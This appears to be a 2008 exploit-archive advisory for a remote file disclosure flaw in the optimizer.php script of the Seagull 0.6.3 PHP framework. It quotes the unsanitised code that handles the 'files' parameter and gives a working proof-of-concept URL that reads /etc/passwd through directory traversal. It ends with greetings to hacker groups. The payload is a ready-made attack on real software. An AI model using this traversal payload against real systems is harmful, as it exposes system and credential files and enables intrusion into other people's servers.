Seagull 0.6.3 (optimizer.php files) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Seagull 0.6.3 (optimizer.php files) Remote File Disclosure Vulnerability
# Published : 2008-01-24
# Author : fuzion
# Previous Title : CandyPress eCommerce suite 4.1.1.26 Multiple Remote Vulnerabilities
# Next Title : Foojan WMS 1.0 (index.php story) Remote SQL Injection Vulnerability

__fuzion___    ____     
       ______/   __//   __/____    
     _/   _/  :           //____\   
    /|      :  :  ..      /          
   | |     ::     ::              /  
   | |     :|     ||      ______/   
   | |     ||     ||      |  /  |    
    |     ||     ||      |   / |    
     |     ||     ||      |  / /_   
     | ___ || ___ ||      | /  /     
      _-_/  _-_/ | ____ |/__/      
                   __--_/          /
                  /____             / 
                 /                /  
                 _______________/   


Product:
Seagull STABLE 0.6.3
http://seagullproject.org/

Vulnerable:
optimizer.php; line 61

        // get files and it's mod time
        if (!empty($_GET['files'])) {
            $filesString = $_GET['files'];
            $aFiles = explode(',', $_GET['files']);
            foreach ($aFiles as $fileName) {
                if (is_file($jsFile = dirname(__FILE__) . '/' . $fileName)) {
                    $this->aFiles[] = $jsFile;
                    $lastMod = max($lastMod, filemtime($jsFile));

PoC:
http://pentest.localhost/seagull-0.6.3/www/optimizer.php?files=../../../../../../../../etc/passwd

Greetings to:
d3hydr8, whoami, beenu, kasi, MosDef, etc
Everyone at darkc0de.com & rootmybox.org

# www.Syue.com [2008-01-24]